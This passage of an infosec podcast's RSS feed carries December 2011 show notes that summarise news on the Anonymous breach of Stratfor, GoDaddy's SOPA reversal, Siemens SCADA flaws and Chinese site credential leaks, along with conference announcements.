	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.nbcmiami.com/news/local/Miami-PD-Among-Targets-of-Internet-Activist-Hackers-136243498.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nbcmiami.com/news/local/Miami-PD-Among-Targets-of-Internet-Activist-Hackers-136243498.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Miami Police Department spokesman said he has no idea why they were listed as a target by an activist hacker protest group called &ldquo;Anonymous.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sgt. Freddie Cruz said Miami Police have &quot;not identified any breach&quot; yet. If they do, they will &quot;move swiftly (with the FBI) to investigate and apprehend&quot; them.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meantime, Anonymous shut down the website of a global security firm called &ldquo;Stratfor,&rdquo; claiming to steal its client list and 50,000 credit card numbers &#8212; and then use that data to withdraw money from clients&rsquo; accounts and donate $1 million to charities.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous is loosely knit and decentralized by design, so it does not necessarily speak with one voice, and confirmation is hard to come by.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A vice president for one South Florida cloud-based Internet security firm, Prolexic, warns this kind of activist hacking will continue to expand.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is extremely widespread these days,&rdquo; said Neal Quinn, vice president for operations at Prolexic, which has helped some victims of Anonymous. &ldquo;Activism is something that we see in all corners of the Internet. And it&#39;s very often associated with a viewpoint that many people in the population share. It&rsquo;s definitely not fringe anymore.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Quinn said individuals have little to fear from Anonymous unless they are part of a corporation or institution involved in sensitive political or social issues, as Stratfor is.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><br />
	<a href="http://www.pcmag.com/article2/0,2817,2398038,00.asp?kc=PCRSS05079TX1K0000992"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2398038,00.asp?kc=PCRSS05079TX1K0000992</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GoDaddy on Friday withdrew its support for the controversial Stop Online Piracy Act (SOPA) amidst a backlash from customers who were vehemently against the legislation.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a statement, GoDaddy CEO Warren Adelman said the company will support SOPA &quot;when and if the Internet community supports it.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A previously published, lengthy defense of SOPA now points to GoDaddy&#39;s updated statement, which the company said is intended to &quot;eliminate any confusion.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The move comes after a Reddit user called on those with GoDaddy domains to move them elsewhere by Dec. 29, prompting godaddyboycott.org.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cheezburger CEO Ben Huh quickly pledged to make the move. &quot;We will move our 1,000 domains off @godaddy unless you drop support of SOPA. We love you guys, but #SOPA-is-cancer to the Free Web,&quot; Huh tweeted yesterday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today, Huh tweeted &quot;Congrats Internet. You did it!&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In his statement, GoDaddy&#39;s Adelman said &quot;Fighting online piracy is of the utmost importance, which is why Go Daddy has been working to help craft revisions to this legislation&mdash;but we can clearly do better.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GoDaddy and its general counsel, Christine Jones, worked &quot;for months&quot; to help craft a bill.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Jones has fought to express the concerns of the entire Internet community and to improve the bill by proposing changes to key defined terms, limitations on DNS filtering to ensure the integrity of the Internet, more significant consequences for frivolous claims, and specific provisions to protect free speech,&quot; GoDaddy said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://news.softpedia.com/news/Siemens-Promises-to-Patch-SCADA-Flaws-After-they-Angered-Researcher-243014.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Siemens-Promises-to-Patch-SCADA-Flaws-After-they-Angered-Researcher-243014.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A few days back we saw how security researcher Billy Rios got angry at Siemens after the company claimed that no authorization bypass flaws were present in their SIMATIC systems. Now, Siemens came forward with a statement reporting that they&rsquo;re planning to fix the vulnerabilities next month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rios became upset last week after he&rsquo;d found out from a Reuters reporter that Siemens officially denied knowing of the authentication flaws he had disclosed to them earlier this year. After the scandal broke out, the SCADA components manufacturer released an official comment.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Siemens was notified by IT experts (Billy Rios and Terry McCorke) about vulnerabilities in some of its automation products. These are the WinCC flexible RT versions from 2004 to 2008 SP2 and WinCC Runtime Advanced V11 and multiple Simatic panels (TP, OP, MP, Comfort),&rdquo; the company </span><a href="http://www.industry.siemens.com/topics/global/en/industrial-security/pages/Default.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">said</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We are aware of the reported vulnerabilities, first reported in May 2011. Our development had immediately taken action and addressed these issues. The vulnerabilities will be fixed by security updates, first is planned to be issued in January 2012.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They also state that on December 2011 other vulnerabilities had been reported as well, all of them being currently investigated.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Finally, in an attempt to clean their stained reputation, the industrial giant thanks Rios and Terry McCorke for reporting the vulnerabilities.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This comes after Rios highlighted some major weaknesses in the way SIMATIC systems were protected. He showed the default three character passwords used by the web interface and other serious issues that could allow a hacker to easily take over a component of a company&rsquo;s infrastructure. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.penn-olson.com/2011/12/22/hackers-steal-data-of-millions-of-chinese-net-users/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.penn-olson.com/2011/12/22/hackers-steal-data-of-millions-of-chinese-net-users/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Yesterday, the Chinese internet was shaken by the news that IT portal and community CDSN has been hacked and data for its more than six million users had been stolen, including usernames and passwords. Today, reports have it that CDSN wasn&rsquo;t the only site affected.</span><br />
	<a href="http://penn-olson.com/tag/duowan/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Duowan</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a games site, was hacked and hackers stole the data of its over eight million users. 7K7K, also a gaming site, reportedly lost data for 20 million users, and hackers also got info from 10 million accounts by hacking 178.com, another game site. Rumors are spreading that the hacks and leaked data may also have affected major social networking sites like </span><a href="http://penn-olson.com/tag/renren/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Renren</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and </span><a href="http://penn-olson.com/tag/kaixin/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Kaixin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, but those claims appear to be unsubstantiated (at least for now).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Actually, aside from the CDSN hack, none of the other hacks have been officially confirmed yet; however, much of the stolen account information has been published online (see, for example, the image of Duowan usernames and passwords above), so the reports appear to be fairly accurate. This certainly appears to be very bad news for Chinese net users &mdash; and gamers in particular &mdash; but we&rsquo;ll keep an eye on this and update once more has come to light.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick&rsquo;s Top 5 Moments of 2011:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Top &ldquo;anything&rdquo; lists are notoriously hard to make, especially when you&rsquo;re trying to sort through a year&#39;s worth of memories and can barely remember last week. &nbsp;So without further ado, here is my best of 2011 &#8211; my top five personal moments of the year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">5) BackTrack 5 Released-</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Long awaited, the release of BT5 was something that most people looked forward to. &nbsp;It took the repos no longer being available to cause me to make the transition. &nbsp;Since then it&rsquo;s grown on me and has certainly made my life easier. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">4) Hackitivism</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Without identifying &nbsp;a single group I would have to say that the various hackitist activities have had a lasting impact on the industry and the general populous. &nbsp;Okay maybe not the general public, but certainly on most Governments across the globe.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">3) OS X Lion</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; The long awaited arrival of OS X Lion was met with disdain and disgust over having programs that functioned well with Leopard and Snow Leopard suddenly stop working. &nbsp;Lesson here is that sometimes it pays to wait on upgrades. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">2) DerbyCon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; Finally a security conference that the average InfoSec practitioner can actually get tickets for. &nbsp;But more than that, it&rsquo;s a conference that allows us to see &ldquo;rockstars&rdquo; in a really intimate setting. &nbsp;If I attend only one conference next year, it WILL be DerbyCon.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">1) Our Crew</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; The addition of Boris, Dave, Beau and Them to our show as co-hosts. &nbsp;So maybe this is not a security moment, but it certainly had an great impact on me. &nbsp;Putting on a daily show is very taxing on us personally and they have certainly added some great insight, content and assistance in keeping this show going. &nbsp;I want to personally thank Karthik, Geordy, Adrian, Boris, Dave, Beau and Them. &nbsp;Without these great guys this show wouldn&rsquo;t have lasted this long.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-553-stratfor-miamipdgodaddy-siemens-cdsn-ricks-top-5/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3304/0/infosec-daily-podcast-episode-553.mp3" length="18200177" type="audio/mpeg" />
		<itunes:duration>0:37:52</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 553 for December 27, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all k[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 553 for December 27, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.computerworld.com/s/article/9223025/Confidential_client_list_safe_from_Anonymous_Stratfor_says
	Activist hacker group Anonymous has claimed to have stolen thousands of emails, passwords and sensitive credit card details from a US-based security think-tank, forcing it to suspend operations. &#160;Promising it was just the start of a week-long Christmas inspired assault on a long list of targets.
	The Hackers Group said they were obtain the information because the stratfor did not encrypt it. The Austin-based company which provides international affairs and security threats, says the operation has been suspended on its server and email. Stratfor website was not working on Monday .
	The breach doesn&#39;t necessarily pose a risk to owners of the credit cards. A card user who suspects fraudulent activity on his or her card can contact the credit card company to dispute the charge.
	Stratfor said in an email to members that it had suspended its servers and email after learning that its website had been hacked. Stratfor&#39;s sent an e-mail to subscribers yesterday, confirming the cyberattack .
	&#34;We have reason to believe that the names of our corporate subscribers have been posted on other web sites,&#34; said the email, signed by Stratfor Chief Executive George Friedman and passed on to AP by subscribers. &#34;We are diligently investigating the extent to which subscriber information may have been obtained.&#34;
	&#34;Stratfor&#39;s relationship with its members and, in particular, the confidentiality of their subscriber information, are very important to Stratfor and me,&#34; Friedman wrote.
	One member of the hacking group, who uses the handle AnonymousAbu on Twitter, claimed that more than 90,000 credit cards from law enforcement, the intelligence community and journalists &#8211; &#34;corporate/exec accounts of people l[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 552 &#8211; EL/PDC/ISD Christmas Caroling, Siemens, Manning, LogMeIn Free, Islamic Compass, Web Rule Rewrite &amp; Op Elveden</title>
		<link>http://www.isdpodcast.com/episode-552-elpdcisd-christmas-caroling-siemens-manning-logmein-free-islamic-compass-web-rule-rewrite-op-elveden</link>
		<comments>http://www.isdpodcast.com/episode-552-elpdcisd-christmas-caroling-siemens-manning-logmein-free-islamic-compass-web-rule-rewrite-op-elveden#comments</comments>
		<pubDate>Fri, 23 Dec 2011 01:50:58 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3299</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 552 for December 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma. &#160; Announcements: No Show Tomorrow Night! &#160;Next show will on December 27th. Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 552 for December 22, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No Show Tomorrow Night! &nbsp;Next show will on December 27th.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span><br />
	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
